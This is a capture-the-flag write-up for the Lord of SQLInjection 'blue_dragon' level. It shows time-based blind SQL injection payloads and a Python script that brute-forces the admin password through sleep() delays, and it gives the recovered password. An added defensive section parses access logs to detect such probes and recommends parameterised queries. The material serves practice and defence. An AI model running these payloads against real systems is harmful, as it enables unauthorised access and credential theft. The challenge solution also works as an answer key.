
# \[Lord Of SQLInjection] blue\_dragon

<figure><img src="https://blog.kakaocdn.net/dna/wWhyp/btsNBxCUTsT/AAAAAAAAAAAAAAAAAAAAAA4-OfIgopCcpL4L_pIPA8l4JeuasFSkVvKIanyZZRSp/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=2Yy2zNOFMlXCwbsqhpDc5fz9ILs%3D" alt="" height="371" width="726"><figcaption></figcaption></figure>

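#### Approach

\- preg\_match is applied in two separate places

\- Single quotes are not filtered on input, but they are filtered when the result is printed

\- I need the admin password. I tried to build a query that would reveal admin's pw without single quotes, but failed, so I simply decided to use time based SQL injection.

\- Even when the result is No Hack, the delay still occurs when the condition is true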

```
[domain]?pw=' or if(id='admin' and length(pw)=any number, sleep(3), 1)%23
```

→ The password length is 8

```
import requests
import time

# Challenge URL and session cookie for the wargame
url = "https://los.rubiya.kr/chall/blue_dragon_23f2e3c81dca66e496c7de2d63b82984.php?"
cookie = dict(PHPSESSID="cvr4q0t61op02qkd6b7dp6a98e")

result = ""

# The password is 8 characters long; test each position against printable ASCII
for i in range(1, 9):
    for j in range(33, 127):
        start = time.time()
        query = "pw=' or if(id='admin' and ascii(substr(pw, {},1))={},sleep(3),1)%23".format(i, j)
        URL = url + query
        res = requests.get(URL, cookies=cookie)
        end = time.time()
        # A response slower than 3 seconds means the condition was true
        if end - start > 3:
            result += chr(j)
            print(chr(j))
```

```
[domain]?pw=' or if(id='admin' and ord(substr(pw, index, 1))=any char,sleep(3), 1)%23
```

→ pw is d948b8a0

<figure><img src="https://blog.kakaocdn.net/dna/6ctX8/btsNDqvPYjq/AAAAAAAAAAAAAAAAAAAAAEHFPp4ep3lLdN0Z1Bqj_7-6YRaWz_nMmjrY6xm2kA0u/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=OEWGGKbWrM3zOgsqRkEPXBdfC0g%3D" alt="" height="432" width="660"><figcaption></figcaption></figure>
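Because the delay fires even when the page prints No Hack, the response time recorded in an access log shows which guesses were true. The following is an added example, not part of the original write-up: it scans log lines for `sleep()` probes and rebuilds what a client learned from the slow responses. The log format, the `/chall.php` path, the client addresses and the names `analyze` and `SAMPLE_LOG` are assumptions made for the illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample access log: client, request line, status, request time (seconds).
SAMPLE_LOG = """\
203.0.113.7 "GET /chall.php?pw=%27%20or%20if(id=%27admin%27%20and%20length(pw)=7,sleep(3),1)%23 HTTP/1.1" 200 0.021
203.0.113.7 "GET /chall.php?pw=%27%20or%20if(id=%27admin%27%20and%20length(pw)=8,sleep(3),1)%23 HTTP/1.1" 200 3.019
203.0.113.7 "GET /chall.php?pw=%27%20or%20if(id=%27admin%27%20and%20ascii(substr(pw,%201,1))=99,sleep(3),1)%23 HTTP/1.1" 200 0.018
203.0.113.7 "GET /chall.php?pw=%27%20or%20if(id=%27admin%27%20and%20ascii(substr(pw,%201,1))=100,sleep(3),1)%23 HTTP/1.1" 200 3.024
203.0.113.7 "GET /chall.php?pw=%27%20or%20if(id=%27admin%27%20and%20ascii(substr(pw,%202,1))=57,sleep(3),1)%23 HTTP/1.1" 200 3.031
198.51.100.4 "GET /chall.php?pw=guest HTTP/1.1" 200 0.015
"""

# Assumed log layout (hypothetical, adapt to the real access-log format in use).
LINE = re.compile(r'^(\S+) "GET (\S+) HTTP/[\d.]+" (\d{3}) ([\d.]+)$')
SLEEP = re.compile(r'sleep\s*\(\s*(\d+(?:\.\d+)?)\s*\)', re.I)
CHAR = re.compile(r'(?:ascii|ord)\s*\(\s*substr\s*\(\s*\w+\s*,\s*(\d+)\s*,'
                  r'\s*1\s*\)\s*\)\s*=\s*(\d+)', re.I)


def analyze(log_text):
    """Return {client: {"probes": n, "true_hits": n, "leaked": {position: char}}}."""
    report = {}
    for line in log_text.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue
        client, target, _status, elapsed = m.groups()
        query = unquote(target.partition("?")[2])  # decode %27, %20, %23 ...
        s = SLEEP.search(query)
        if not s:
            continue  # no time-delay function in the query string
        entry = report.setdefault(client, {"probes": 0, "true_hits": 0, "leaked": {}})
        entry["probes"] += 1
        # The request took at least the requested delay: the injected condition was true.
        if float(elapsed) >= float(s.group(1)):
            entry["true_hits"] += 1
            c = CHAR.search(query)
            if c:
                entry["leaked"][int(c.group(1))] = chr(int(c.group(2)))
    return report


if __name__ == "__main__":
    print(analyze(SAMPLE_LOG))
```

The fix on the application side is to bind `pw` as a query parameter, or at least to reject the input before the query runs, so that no attacker-controlled expression reaches the database.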
